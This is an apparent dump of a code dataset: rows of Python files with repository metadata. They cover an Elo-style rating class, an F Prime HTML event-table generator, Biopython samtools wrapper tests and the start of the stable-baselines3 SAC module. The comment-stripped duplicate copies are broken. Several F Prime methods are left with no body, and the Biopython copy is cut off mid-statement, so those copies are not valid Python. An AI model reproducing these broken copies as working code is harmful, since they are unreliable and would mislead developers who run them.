k_value: float = DEFAULT_K_VALUE,
d_value: float = DEFAULT_D_VALUE,
score_function_base: float = DEFAULT_SCORING_FUNCTION_BASE,
custom_score_function: Callable = None,
log_base: int = 10,
logger: logging.Logger = None,
):
self.k = k_value
self.d = d_value
self._score_func = custom_score_function or create_exponential_score_function(base=score_function_base)
self._log_base = log_base
self.logger = logger or _default_logger
def get_new_ratings(
self,
initial_ratings: Union[List[float], np.ndarray],
result_order: List[int] = None,
) -> np.ndarray:
if not isinstance(initial_ratings, np.ndarray):
initial_ratings = np.array(initial_ratings)
n = len(initial_ratings)
actual_scores = self.get_actual_scores(n, result_order)
expected_scores = self.get_expected_scores(initial_ratings)
scale_factor = self.k * (n - 1)
return initial_ratings + scale_factor * (actual_scores - expected_scores)
def get_actual_scores(self, n: int, result_order: List[int] = None) -> np.ndarray:
result_order = result_order or list(range(n))
scores = self._score_func(n)
scores = scores[np.argsort(np.argsort(result_order))]
distinct_results = set(result_order)
if len(distinct_results) != n:
for place in distinct_results:
idx = [i for i, x in enumerate(result_order) if x == place]
scores[idx] = scores[idx].mean()
self._validate_actual_scores(scores, result_order)
return scores
@staticmethod
def _validate_actual_scores(scores: np.ndarray, result_order: List[int]):
if not np.allclose(1, sum(scores)):
raise ValueError("scoring function does not return scores summing to 1")
if min(scores) != 0:
# so only raise error if there isn't a tie for last place
last_place = max(result_order)
if result_order.count(last_place) == 1:
raise ValueError("scoring function does not return minimum value of 0")
if not np.all(np.diff(scores[np.argsort(result_order)]) <= 0):
raise ValueError("scoring function does not return monotonically decreasing values")
def get_expected_scores(self, ratings: Union[List[float], np.ndarray]) -> np.ndarray:
if not isinstance(ratings, np.ndarray):
ratings = np.array(ratings)
if ratings.ndim > 1:
raise ValueError(f"ratings should be 1-dimensional array (received {ratings.ndim})")
diff_mx = ratings - ratings[:, np.newaxis]
print(f"diff_mx = \n{diff_mx}")
logistic_mx = 1 / (1 + self._log_base ** (diff_mx / self.d))
np.fill_diagonal(logistic_mx, 0)
expected_scores = logistic_mx.sum(axis=1)
n = len(ratings)
denom = n * (n - 1) / 2
expected_scores = expected_scores / denom
if not np.allclose(1, sum(expected_scores)):
raise ValueError("expected scores do not sum to 1")
return expected_scores
def simulate_win_probabilities(
self,
ratings: Union[List[float], np.ndarray],
n_sim: int = int(1e5),
seed: int = None,
) -> np.ndarray:
if seed is not None:
np.random.seed(seed)
idx = np.argsort(ratings)
ratings = sorted(ratings)
n_players = len(ratings)
n_sim = int(n_sim)
scores = np.zeros((n_players, n_sim))
for i, rating in enumerate(ratings):
scores[idx[i], :] = _gumbel_sample(
loc=rating,
scale=self.d,
size=int(n_sim),
base=self._log_base
)
result_mx = self._convert_scores_to_result_proportions(scores)
return result_mx
@staticmethod
def _convert_scores_to_result_proportions(scores: np.ndarray) -> np.ndarray:
results = np.argsort(-scores, axis=0)
n = scores.shape[0]
count_mx = np.zeros((n, n))
for i, x in enumerate(results):
counts = np.bincount(x, minlength=n)
count_mx[:, i] = counts
proportion_mx = count_mx / scores.shape[1]
return proportion_mx
def _gumbel_sample(
loc: float,
scale: float,
size: int = 1,
base: float = np.exp(1),
) -> np.ndarray:
if scale <= 0:
raise ValueError("scale parameter for Gumbel distribution must be > 0")
p = np.random.rand(int(size))
return loc - scale * _log(-_log(p, base=base), base=base)
def _log(x, base=np.exp(1)):
return np.log(x) / np.log(base)
| true
| true
|
f7059d3b8fda64f363f295486c2fbf3de3035548
| 7,411
|
py
|
Python
|
Autocoders/Python/src/fprime_ac/generators/visitors/InstanceTopologyEventsHTMLVisitor.py
|
LeStarch/lgtm-fprime
|
904b0311fe647745b29075d44259d1dc1f4284ae
|
[
"Apache-2.0"
] | null | null | null |
Autocoders/Python/src/fprime_ac/generators/visitors/InstanceTopologyEventsHTMLVisitor.py
|
LeStarch/lgtm-fprime
|
904b0311fe647745b29075d44259d1dc1f4284ae
|
[
"Apache-2.0"
] | null | null | null |
Autocoders/Python/src/fprime_ac/generators/visitors/InstanceTopologyEventsHTMLVisitor.py
|
LeStarch/lgtm-fprime
|
904b0311fe647745b29075d44259d1dc1f4284ae
|
[
"Apache-2.0"
] | null | null | null |
# ===============================================================================
# NAME: InstanceTopologyHTMLVisitor.py
#
# DESCRIPTION: A visitor responsible for the generation of HTML tables
# of event ID's, etc.
#
# AUTHOR: reder
# EMAIL: reder@jpl.nasa.gov
# DATE CREATED : Sep. 13, 2016
#
# Copyright 2016, California Institute of Technology.
# ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged.
# ===============================================================================
#
# Python standard modules
#
import logging
import os
import sys
from fprime_ac.generators import formatters
# from fprime_ac.utils import DiffAndRename
from fprime_ac.generators.visitors import AbstractVisitor
from fprime_ac.models import ModelParser
#
# Python extention modules and custom interfaces
#
# from Cheetah import Template
# from fprime_ac.utils import version
from fprime_ac.utils import ConfigManager
#
# Import precompiled templates here
#
try:
from fprime_ac.generators.templates.html import HtmlEventsTablePage
except ImportError:
print("ERROR: must generate python templates first.")
sys.exit(-1)
#
# Universal globals used within module go here.
# (DO NOT USE MANY!)
#
# Global logger init. below.
PRINT = logging.getLogger("output")
DEBUG = logging.getLogger("debug")
#
# Module class or classes go here.
class InstanceTopologyEventsHTMLVisitor(AbstractVisitor.AbstractVisitor):
    """
    Visitor that generates one HTML event-table page per component instance
    that declares events (written to ``events/<instance>_events.html``).

    NOTE(review): the original docstring said "component header classes in
    C++" — a stale copy-paste from another visitor; this class only emits
    HTML via the HtmlEventsTablePage template.
    """

    # NOTE(review): these class-level slots are never assigned elsewhere in
    # this class; they look like leftovers from a singleton pattern — confirm
    # against AbstractVisitor before removing.
    __instance = None
    __config = None
    __fp_dict = None
    __form = None
    __form_comment = None
    __model_parser = None

    def __init__(self):
        """
        Constructor.
        """
        super().__init__()
        # self.initBase(self, "HTMLCmdTable")
        self.__config = ConfigManager.ConfigManager.getInstance()
        self.__form = formatters.Formatters()
        self.__form_comment = formatters.CommentFormatters()
        self.__model_parser = ModelParser.ModelParser.getInstance()
        # All generated pages go under this subdirectory of the CWD.
        self.__cmd_dir = "events"
        DEBUG.info("InstanceTopologyHTMLVisitor: Instanced.")
        self.bodytext = ""
        self.prototypetext = ""
        self.__fp_dict = (
            dict()
        )  # dictionary of instance name keyword to file handle pointer

    def _writeTmpl(self, instance, c, visit_str):
        """
        Render template ``c`` and write it to the file handle previously
        opened for ``instance`` in initFilesVisit.
        """
        DEBUG.debug("InstanceTopologyHTMLVisitor:%s" % visit_str)
        DEBUG.debug("===================================")
        DEBUG.debug(c)
        self.__fp_dict[instance].writelines(c.__str__())
        DEBUG.debug("===================================")

    def initFilesVisit(self, obj):
        """
        Defined to generate files for generated code products.
        Opens one output file per component instance that has events; the
        handles stay open until finishSourceFilesVisit closes them.
        @parms obj: the instance of the model to visit.
        """
        # Check for command dir here and if none create it but always switch into it
        if not os.path.exists(self.__cmd_dir):
            os.mkdir(self.__cmd_dir)
        os.chdir(self.__cmd_dir)

        # Iterate over types
        for k in list(obj.get_base_id_dict().keys()):
            tlist = obj.get_base_id_dict()[k]
            # print "Type: %s\n" % k,
            # Iterate over instances and get name
            # Open file if events exist if not do nothing
            for t in tlist:
                # print "\tInstance: %s, Base ID: %s\n" % (t[0],t[1])
                name = t[0]
                events_list = t[3].get_comp_xml().get_events()
                if len(events_list) > 0:
                    filename = "%s_events.html" % t[0]
                    # Open file for writing here...
                    DEBUG.info("Open file: %s" % filename)
                    try:
                        self.__fp_dict[name] = open(filename, "w")
                        DEBUG.info("Completed")
                    except OSError:
                        PRINT.info("Could not open %s file." % filename)
                        sys.exit(-1)
                    DEBUG.info(
                        "Generating HTML Event Table for %s:%s component instance..."
                        % (t[0], k)
                    )
        os.chdir("..")

    def startSourceFilesVisit(self, obj):
        """
        Defined to generate starting static code within files.
        (No-op for this HTML visitor.)
        """

    def includes1Visit(self, obj):
        """
        Defined to generate includes within a file.
        Usually used for the base classes but also for Port types
        (No-op for this HTML visitor.)
        @parms args: the instance of the concrete element to operation on.
        """

    def includes2Visit(self, obj):
        """
        Defined to generate internal includes within a file.
        Usually used for data type includes and system includes.
        (No-op for this HTML visitor.)
        @parms args: the instance of the concrete element to operation on.
        """

    def namespaceVisit(self, obj):
        """
        Defined to generate namespace code within a file.
        Also any pre-condition code is generated.
        (No-op for this HTML visitor.)
        @parms args: the instance of the concrete element to operation on.
        """

    def eventArgsStr(self):
        """
        Return a callable that formats a list of event args (name, ...) into
        an argument string via the inherited argsString helper.
        """

        def f(args):
            def g(lst):
                # Each arg is a tuple/list whose first element is the name.
                name = lst[0]
                return name

            return self.argsString(list(map(g, args)))

        return f

    def publicVisit(self, obj):
        """
        Defined to generate public stuff within a class.
        Fills one shared template object per instance and renders it into
        that instance's already-open output file.
        @parms args: the instance of the concrete element to operation on.
        """
        # os.chdir(self.__cmd_dir)
        c = HtmlEventsTablePage.HtmlEventsTablePage()
        for k in list(obj.get_base_id_dict().keys()):
            tlist = obj.get_base_id_dict()[k]
            # print "Type: %s\n" % k,
            for t in tlist:
                if t[0] in list(self.__fp_dict.keys()):
                    # print "\tInstance: %s, Base ID: %s\n" % (t[0],t[1])
                    eobj = t[3].get_comp_xml()
                    c.name = "{}:{}".format(t[0], k)
                    c.base_id = t[1]
                    c.has_events = len(eobj.get_events()) > 0
                    c.events = self.__model_parser.getEventsList(eobj)
                    c.event_enums = self.__model_parser.getEventEnumList(eobj)
                    c.event_args = self.__model_parser.getEventArgsDict(eobj)
                    c.event_params = c.event_args
                    c.event_args_str = self.eventArgsStr()
                    c.event_param_strs = self.__model_parser.getEventArgsPrototypeStringDict(
                        eobj
                    )
                    self._writeTmpl(t[0], c, "InstanceTopologyEventsHTML_Visitor")

    def protectedVisit(self, obj):
        """
        Defined to generate protected stuff within a class.
        (No-op for this HTML visitor.)
        @parms args: the instance of the concrete element to operation on.
        """

    def privateVisit(self, obj):
        """
        Defined to generate private stuff within a class.
        (No-op for this HTML visitor.)
        @parms args: the instance of the concrete element to operation on.
        """

    def finishSourceFilesVisit(self, obj):
        """
        Defined to generate ending static code within files.
        Closes every file handle opened in initFilesVisit.
        """
        for fp in list(self.__fp_dict.keys()):
            self.__fp_dict[fp].close()
        PRINT.info("Completed generating HTML event tables...")
| 34.793427
| 93
| 0.568344
|
#
# AUTHOR: reder
# EMAIL: reder@jpl.nasa.gov
# DATE CREATED : Sep. 13, 2016
#
# Copyright 2016, California Institute of Technology.
# ALL RIGHTS RESERVED. U.S. Government Sponsorship acknowledged.
# ===============================================================================
#
# Python standard modules
#
import logging
import os
import sys
from fprime_ac.generators import formatters
# from fprime_ac.utils import DiffAndRename
from fprime_ac.generators.visitors import AbstractVisitor
from fprime_ac.models import ModelParser
#
# Python extention modules and custom interfaces
#
# from Cheetah import Template
# from fprime_ac.utils import version
from fprime_ac.utils import ConfigManager
#
# Import precompiled templates here
#
try:
from fprime_ac.generators.templates.html import HtmlEventsTablePage
except ImportError:
print("ERROR: must generate python templates first.")
sys.exit(-1)
#
# Universal globals used within module go here.
# (DO NOT USE MANY!)
#
# Global logger init. below.
PRINT = logging.getLogger("output")
DEBUG = logging.getLogger("debug")
#
# Module class or classes go here.
class InstanceTopologyEventsHTMLVisitor(AbstractVisitor.AbstractVisitor):
__instance = None
__config = None
__fp_dict = None
__form = None
__form_comment = None
__model_parser = None
def __init__(self):
super().__init__()
# self.initBase(self, "HTMLCmdTable")
self.__config = ConfigManager.ConfigManager.getInstance()
self.__form = formatters.Formatters()
self.__form_comment = formatters.CommentFormatters()
self.__model_parser = ModelParser.ModelParser.getInstance()
self.__cmd_dir = "events"
DEBUG.info("InstanceTopologyHTMLVisitor: Instanced.")
self.bodytext = ""
self.prototypetext = ""
self.__fp_dict = (
dict()
) # dictionary of instance name keyword to file handle pointer
def _writeTmpl(self, instance, c, visit_str):
DEBUG.debug("InstanceTopologyHTMLVisitor:%s" % visit_str)
DEBUG.debug("===================================")
DEBUG.debug(c)
self.__fp_dict[instance].writelines(c.__str__())
DEBUG.debug("===================================")
def initFilesVisit(self, obj):
# Check for command dir here and if none creat it but always switch into it
if not os.path.exists(self.__cmd_dir):
os.mkdir(self.__cmd_dir)
os.chdir(self.__cmd_dir)
# Iterate over types
for k in list(obj.get_base_id_dict().keys()):
tlist = obj.get_base_id_dict()[k]
# print "Type: %s\n" % k,
# Iterate over instances and get name
# Open file if events exist if not do nothing
for t in tlist:
# print "\tInstance: %s, Base ID: %s\n" % (t[0],t[1])
name = t[0]
events_list = t[3].get_comp_xml().get_events()
if len(events_list) > 0:
filename = "%s_events.html" % t[0]
# Open file for writing here...
DEBUG.info("Open file: %s" % filename)
try:
self.__fp_dict[name] = open(filename, "w")
DEBUG.info("Completed")
except OSError:
PRINT.info("Could not open %s file." % filename)
sys.exit(-1)
DEBUG.info(
"Generating HTML Event Table for %s:%s component instance..."
% (t[0], k)
)
os.chdir("..")
def startSourceFilesVisit(self, obj):
def includes1Visit(self, obj):
def includes2Visit(self, obj):
def namespaceVisit(self, obj):
def eventArgsStr(self):
def f(args):
def g(lst):
name = lst[0]
return name
return self.argsString(list(map(g, args)))
return f
def publicVisit(self, obj):
# os.chdir(self.__cmd_dir)
c = HtmlEventsTablePage.HtmlEventsTablePage()
for k in list(obj.get_base_id_dict().keys()):
tlist = obj.get_base_id_dict()[k]
# print "Type: %s\n" % k,
for t in tlist:
if t[0] in list(self.__fp_dict.keys()):
# print "\tInstance: %s, Base ID: %s\n" % (t[0],t[1])
eobj = t[3].get_comp_xml()
c.name = "{}:{}".format(t[0], k)
c.base_id = t[1]
c.has_events = len(eobj.get_events()) > 0
c.events = self.__model_parser.getEventsList(eobj)
c.event_enums = self.__model_parser.getEventEnumList(eobj)
c.event_args = self.__model_parser.getEventArgsDict(eobj)
c.event_params = c.event_args
c.event_args_str = self.eventArgsStr()
c.event_param_strs = self.__model_parser.getEventArgsPrototypeStringDict(
eobj
)
self._writeTmpl(t[0], c, "InstanceTopologyEventsHTML_Visitor")
def protectedVisit(self, obj):
def privateVisit(self, obj):
def finishSourceFilesVisit(self, obj):
for fp in list(self.__fp_dict.keys()):
self.__fp_dict[fp].close()
PRINT.info("Completed generating HTML event tables...")
| true
| true
|
f7059d4b996373df631835952df25f3736b20114
| 10,386
|
py
|
Python
|
Tests/test_samtools_tool.py
|
bneron/biopython
|
2c52e57661c8f6cdf4a191850b2f6871f8582af7
|
[
"PostgreSQL"
] | null | null | null |
Tests/test_samtools_tool.py
|
bneron/biopython
|
2c52e57661c8f6cdf4a191850b2f6871f8582af7
|
[
"PostgreSQL"
] | null | null | null |
Tests/test_samtools_tool.py
|
bneron/biopython
|
2c52e57661c8f6cdf4a191850b2f6871f8582af7
|
[
"PostgreSQL"
] | null | null | null |
# Copyright 2014 by Saket Choudhary. Based on test_Clustalw_tool.py by Peter
# Cock .
#
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
# Last Checked with samtools [0.1.18 (r982:295)]
from Bio import MissingExternalDependencyError
import sys
import os
import unittest
from Bio.Sequencing.Applications import SamtoolsViewCommandline
from Bio.Sequencing.Applications import SamtoolsCalmdCommandline
from Bio.Sequencing.Applications import SamtoolsCatCommandline
from Bio.Sequencing.Applications import SamtoolsFaidxCommandline
from Bio.Sequencing.Applications import SamtoolsIdxstatsCommandline
from Bio.Sequencing.Applications import SamtoolsIndexCommandline
from Bio.Sequencing.Applications import SamtoolsMergeCommandline
from Bio.Sequencing.Applications import SamtoolsMpileupCommandline
from Bio.Sequencing.Applications import SamtoolsSortCommandline
# TODO from Bio.Sequencing.Applications import SamtoolsPhaseCommandline
# TODO from Bio.Sequencing.Applications import SamtoolsReheaderCommandline
# TODO from Bio.Sequencing.Applications import SamtoolsRmdupCommandline
# TODO from Bio.Sequencing.Applications import SamtoolsTargetcutCommandline
# TODO from Bio.Sequencing.Applications import SamtoolsFixmateCommandline
#################################################################
# Try to avoid problems when the OS is in another language
# Force the C locale so samtools' messages are in English and parseable below.
os.environ['LANG'] = 'C'
samtools_exe = None
if sys.platform == "win32":
    # On Windows, probe likely install locations under Program Files.
    # TODO - Check the path?
    try:
        # This can vary depending on the Windows language.
        prog_files = os.environ["PROGRAMFILES"]
    except KeyError:
        prog_files = r"C:\Program Files"
    # By default tries C:\Program Files\samtools\samtools.exe
    # or C:\Program Files\samtools.exe was chosen
    likely_dirs = ["samtools", ""]
    likely_exes = ["samtools.exe"]
    for folder in likely_dirs:
        if os.path.isdir(os.path.join(prog_files, folder)):
            for filename in likely_exes:
                if os.path.isfile(os.path.join(prog_files, folder, filename)):
                    samtools_exe = os.path.join(prog_files, folder, filename)
                    break
        if samtools_exe:
            break
else:
    # Elsewhere, rely on samtools being on the PATH and recognise it by
    # its own usage banner rather than the shell's (localised) error text.
    from Bio._py3k import getoutput
    output = getoutput("samtools")
    # Since "not found" may be in another language, try and be sure this is
    # really the samtools tool's output
    if ("not found" not in output and
            "samtools (Tools for alignments in the SAM format)" in output):
        samtools_exe = "samtools"
if not samtools_exe:
    # Skip the whole test module if the external tool is unavailable.
    raise MissingExternalDependencyError(
        """Install samtools and correctly set the file path to the program
        if you want to use it from Biopython""")
class SamtoolsTestCase(unittest.TestCase):
    """Class for implementing Samtools test cases."""

    def setUp(self):
        """Resolve paths to the bundled test data and register files to clean up."""
        # All test data lives in subdirectories next to this test module.
        base = os.path.dirname(os.path.abspath(__file__))
        self.samfile1 = os.path.join(base, "SamBam", "sam1.sam")
        self.reference = os.path.join(base, "BWA",
                                      "human_g1k_v37_truncated.fasta")
        self.referenceindexfile = os.path.join(base, "BWA",
                                               "human_g1k_v37_truncated.fasta.fai")
        self.samfile2 = os.path.join(base, "SamBam", "sam2.sam")
        self.bamfile1 = os.path.join(base, "SamBam", "bam1.bam")
        self.bamfile2 = os.path.join(base, "SamBam", "bam2.bam")
        self.outsamfile = os.path.join(base, "SamBam", "out.sam")
        self.outbamfile = os.path.join(base, "SamBam", "out.bam")
        self.bamindexfile1 = os.path.join(base, "SamBam", "bam1.bam.bai")
        self.sortedbamfile1 = os.path.join(base, "SamBam", "bam1_sorted.bam")
        self.sortedbamfile2 = os.path.join(base, "SamBam", "bam2_sorted.bam")
        # Files generated by the tests below; removed again in tearDown.
        self.files_to_clean = [self.referenceindexfile, self.bamindexfile1,
                               self.outbamfile]

    def tearDown(self):
        """Delete any files the tests created."""
        for filename in self.files_to_clean:
            if os.path.isfile(filename):
                os.remove(filename)

    def test_view(self):
        """Test for samtools view"""
        cmdline = SamtoolsViewCommandline(samtools_exe)
        cmdline.set_parameter("input_file", self.bamfile1)
        stdout_bam, stderr_bam = cmdline()
        # Viewing a BAM file should produce no error output.  (The original
        # check used stderr_bam.startswith(""), which is vacuously true.)
        self.assertFalse(stderr_bam,
                         "BAM file viewing failed:\n%s\nStderr:%s"
                         % (cmdline, stderr_bam))
        cmdline.set_parameter("input_file", self.samfile1)
        cmdline.set_parameter("S", True)  # input is SAM, not BAM
        stdout_sam, stderr_sam = cmdline()
        self.assertTrue(
            stdout_sam.startswith("HWI-1KL120:88:D0LRBACXX:1:1101:1780:2146"),
            "SAM file viewing failed:\n%s\nStderr:%s"
            % (cmdline, stderr_sam))

    def create_fasta_index(self):
        """Creates index for reference fasta sequence."""
        cmdline = SamtoolsFaidxCommandline(samtools_exe)
        cmdline.set_parameter("reference", self.reference)
        stdout, stderr = cmdline()

    def create_bam_index(self, input_bam):
        """Creates index of an input bam file"""
        cmdline = SamtoolsIndexCommandline(samtools_exe)
        cmdline.set_parameter("input_bam", input_bam)
        stdout, stderr = cmdline()

    def test_faidx(self):
        """Test for samtools faidx (should create the .fai index file)."""
        cmdline = SamtoolsFaidxCommandline(samtools_exe)
        cmdline.set_parameter("reference", self.reference)
        stdout, stderr = cmdline()
        self.assertFalse(stderr,
                         "Samtools faidx failed:\n%s\nStderr:%s"
                         % (cmdline, stderr))
        self.assertTrue(os.path.isfile(self.referenceindexfile))

    def test_calmd(self):
        """Test for samtools calmd"""
        self.create_fasta_index()
        cmdline = SamtoolsCalmdCommandline(samtools_exe)
        cmdline.set_parameter("reference", self.reference)
        cmdline.set_parameter("input_bam", self.bamfile1)
        # If there is no index file for the reference
        # samtools calmd creates one at the time of calling
        if os.path.exists(self.referenceindexfile):
            stderr_calmd_expected = ""
        else:
            stderr_calmd_expected = "[fai_load] build FASTA index.\n"
        stdout, stderr = cmdline()
        self.assertEqual(stderr, stderr_calmd_expected)

    def test_cat(self):
        """Test for samtools cat (concatenate BAM files)."""
        cmdline = SamtoolsCatCommandline(samtools_exe)
        cmdline.set_parameter("o", self.outbamfile)
        cmdline.set_parameter("input_bam", [self.bamfile1, self.bamfile2])
        stdout, stderr = cmdline()
        self.assertEqual(stderr, "")

    # TODO: def test_fixmate(self):

    def test_sort(self):
        """Test for samtools sort."""
        cmdline = SamtoolsSortCommandline(samtools_exe)
        cmdline.set_parameter("input_bam", self.bamfile1)
        cmdline.set_parameter("out_prefix", "SamBam/out")
        stdout, stderr = cmdline()
        self.assertFalse(stderr,
                         "Samtools sort failed:\n%s\nStderr:%s"
                         % (cmdline, stderr))

    def test_index(self):
        """Test for samtools index (should create the .bai index file)."""
        cmdline = SamtoolsIndexCommandline(samtools_exe)
        cmdline.set_parameter("input_bam", self.bamfile1)
        stdout, stderr = cmdline()
        self.assertFalse(stderr,
                         "Samtools index failed:\n%s\nStderr:%s"
                         % (cmdline, stderr))
        self.assertTrue(os.path.exists(self.bamindexfile1))

    def test_idxstats(self):
        """Test for samtools idxstats (requires a BAM index)."""
        self.create_bam_index(self.bamfile1)
        cmdline = SamtoolsIdxstatsCommandline(samtools_exe)
        cmdline.set_parameter("input_bam", self.bamfile1)
        stdout, stderr = cmdline()
        self.assertFalse(stderr,
                         "Samtools idxstats failed:\n%s\nStderr:%s"
                         % (cmdline, stderr))

    def test_merge(self):
        """Test for samtools merge."""
        cmdline = SamtoolsMergeCommandline(samtools_exe)
        cmdline.set_parameter("input_bam", [self.bamfile1, self.bamfile2])
        cmdline.set_parameter("out_bam", self.outbamfile)
        cmdline.set_parameter("f", True)  # Overwrite out.bam if it exists
        stdout, stderr = cmdline()
        self.assertFalse(stderr,
                         "Samtools merge failed:\n%s\nStderr:%s"
                         % (cmdline, stderr))
        self.assertTrue(os.path.exists(self.outbamfile))

    def test_mpileup(self):
        """Test for samtools mpileup with a single input file."""
        cmdline = SamtoolsMpileupCommandline(samtools_exe)
        cmdline.set_parameter("input_file", [self.bamfile1])
        stdout, stderr = cmdline()
        self.assertFalse("[bam_pileup_core]" in stdout)

    def test_mpileup_list(self):
        """Test for samtools mpileup with a list of sorted input files."""
        cmdline = SamtoolsMpileupCommandline(samtools_exe)
        cmdline.set_parameter("input_file",
                              [self.sortedbamfile1, self.sortedbamfile2])
        stdout, stderr = cmdline()
        self.assertFalse("[bam_pileup_core]" in stdout)

    # TODO: def test_phase(self):
    # TODO: def test_reheader(self):
    # TODO: def test_rmdup(self):
    # TODO: def test_targetcut(self):
if __name__ == "__main__":
    # Run this module's test suite with per-test (verbose) progress output.
    unittest.main(testRunner=unittest.TextTestRunner(verbosity=2))
| 43.638655
| 92
| 0.612074
|
from Bio import MissingExternalDependencyError
import sys
import os
import unittest
from Bio.Sequencing.Applications import SamtoolsViewCommandline
from Bio.Sequencing.Applications import SamtoolsCalmdCommandline
from Bio.Sequencing.Applications import SamtoolsCatCommandline
from Bio.Sequencing.Applications import SamtoolsFaidxCommandline
from Bio.Sequencing.Applications import SamtoolsIdxstatsCommandline
from Bio.Sequencing.Applications import SamtoolsIndexCommandline
from Bio.Sequencing.Applications import SamtoolsMergeCommandline
from Bio.Sequencing.Applications import SamtoolsMpileupCommandline
from Bio.Sequencing.Applications import SamtoolsSortCommandline
mBam",
"bam1.bam")
self.bamfile2 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam2.bam")
self.outsamfile = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"out.sam")
self.outbamfile = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"out.bam")
self.bamindexfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam1.bam.bai")
self.sortedbamfile1 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam1_sorted.bam")
self.sortedbamfile2 = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"SamBam",
"bam2_sorted.bam")
self.files_to_clean = [self.referenceindexfile, self.bamindexfile1, self.outbamfile]
def tearDown(self):
for filename in self.files_to_clean:
if os.path.isfile(filename):
os.remove(filename)
def test_view(self):
cmdline = SamtoolsViewCommandline(samtools_exe)
cmdline.set_parameter("input_file", self.bamfile1)
stdout_bam, stderr_bam = cmdline()
self.assertTrue(stderr_bam.startswith(""),
"SAM file viewing failed: \n%s\nStdout:%s"
% (cmdline, stdout_bam))
cmdline.set_parameter("input_file", self.samfile1)
cmdline.set_parameter("S", True)
stdout_sam, stderr_sam = cmdline()
self.assertTrue(
stdout_sam.startswith("HWI-1KL120:88:D0LRBACXX:1:1101:1780:2146"),
"SAM file viewing failed:\n%s\nStderr:%s"
% (cmdline, stderr_sam))
def create_fasta_index(self):
cmdline = SamtoolsFaidxCommandline(samtools_exe)
cmdline.set_parameter("reference", self.reference)
stdout, stderr = cmdline()
def create_bam_index(self, input_bam):
cmdline = SamtoolsIndexCommandline(samtools_exe)
cmdline.set_parameter("input_bam", input_bam)
stdout, stderr = cmdline()
def test_faidx(self):
cmdline = SamtoolsFaidxCommandline(samtools_exe)
cmdline.set_parameter("reference", self.reference)
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools faidx failed:\n%s\nStderr:%s"
% (cmdline, stderr))
self.assertTrue(os.path.isfile(self.referenceindexfile))
def test_calmd(self):
self.create_fasta_index()
cmdline = SamtoolsCalmdCommandline(samtools_exe)
cmdline.set_parameter("reference", self.reference)
cmdline.set_parameter("input_bam", self.bamfile1)
# If there is no index file for the reference
# samtools calmd creates one at the time of calling
if os.path.exists(self.referenceindexfile):
# print("exists")
stderr_calmd_expected = ""
else:
# print("doesnt exist")
stderr_calmd_expected = "[fai_load] build FASTA index.\n"
stdout, stderr = cmdline()
self.assertEqual(stderr, stderr_calmd_expected)
def test_cat(self):
cmdline = SamtoolsCatCommandline(samtools_exe)
cmdline.set_parameter("o", self.outbamfile)
cmdline.set_parameter("input_bam", [self.bamfile1, self.bamfile2])
stdout, stderr = cmdline()
self.assertEqual(stderr, "")
# TODO: def test_fixmate(self):
def test_sort(self):
cmdline = SamtoolsSortCommandline(samtools_exe)
cmdline.set_parameter("input_bam", self.bamfile1)
cmdline.set_parameter("out_prefix", "SamBam/out")
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools sort failed:\n%s\nStderr:%s"
% (cmdline, stderr))
def test_index(self):
cmdline = SamtoolsIndexCommandline(samtools_exe)
cmdline.set_parameter("input_bam", self.bamfile1)
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools index failed:\n%s\nStderr:%s"
% (cmdline, stderr))
self.assertTrue(os.path.exists(self.bamindexfile1))
def test_idxstats(self):
self.create_bam_index(self.bamfile1)
cmdline = SamtoolsIdxstatsCommandline(samtools_exe)
cmdline.set_parameter("input_bam", self.bamfile1)
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools idxstats failed:\n%s\nStderr:%s"
% (cmdline, stderr))
def test_merge(self):
cmdline = SamtoolsMergeCommandline(samtools_exe)
cmdline.set_parameter("input_bam", [self.bamfile1, self.bamfile2])
cmdline.set_parameter("out_bam", self.outbamfile)
cmdline.set_parameter("f", True) # Overwrite out.bam if it exists
stdout, stderr = cmdline()
self.assertFalse(stderr,
"Samtools merge failed:\n%s\nStderr:%s"
% (cmdline, stderr))
self.assertTrue(os.path.exists(self.outbamfile))
def test_mpileup(self):
cmdline = SamtoolsMpileupCommandline(samtools_exe)
cmdline.set_parameter("input_file", [self.bamfile1])
stdout, stderr = cmdline()
self.assertFalse("[bam_pileup_core]" in stdout)
def test_mpileup_list(self):
cmdline = SamtoolsMpileupCommandline(samtools_exe)
cmdline.set_parameter("input_file", [self.sortedbamfile1, self.sortedbamfile2])
stdout, stderr = cmdline()
self.assertFalse("[bam_pileup_core]" in stdout)
# TODO: def test_phase(self):
# TODO: def test_reheader(self):
# TODO: def test_rmdup(self):
# TODO: def test_targetcut(self):
if __name__ == "__main__":
runner = unittest.TextTestRunner(verbosity=2)
unittest.main(testRunner=runner)
| true
| true
|
f7059d75bd3c6acb85c90246d579ae72b76286c1
| 14,941
|
py
|
Python
|
stable_baselines3/sac/sac.py
|
squalidux/stable-baselines3
|
72690b3ed0635c68f037b3dc121bd9987a6e82a8
|
[
"MIT"
] | 3
|
2022-01-22T21:24:03.000Z
|
2022-03-31T05:32:54.000Z
|
stable_baselines3/sac/sac.py
|
squalidux/stable-baselines3
|
72690b3ed0635c68f037b3dc121bd9987a6e82a8
|
[
"MIT"
] | 1
|
2020-07-31T08:19:32.000Z
|
2020-07-31T08:19:32.000Z
|
stable_baselines3/sac/sac.py
|
squalidux/stable-baselines3
|
72690b3ed0635c68f037b3dc121bd9987a6e82a8
|
[
"MIT"
] | 1
|
2022-03-10T11:33:06.000Z
|
2022-03-10T11:33:06.000Z
|
from typing import Any, Dict, List, Optional, Tuple, Type, Union
import gym
import numpy as np
import torch as th
from torch.nn import functional as F
from stable_baselines3.common.buffers import ReplayBuffer
from stable_baselines3.common.noise import ActionNoise
from stable_baselines3.common.off_policy_algorithm import OffPolicyAlgorithm
from stable_baselines3.common.type_aliases import GymEnv, MaybeCallback, Schedule
from stable_baselines3.common.utils import polyak_update
from stable_baselines3.sac.policies import SACPolicy
class SAC(OffPolicyAlgorithm):
    """
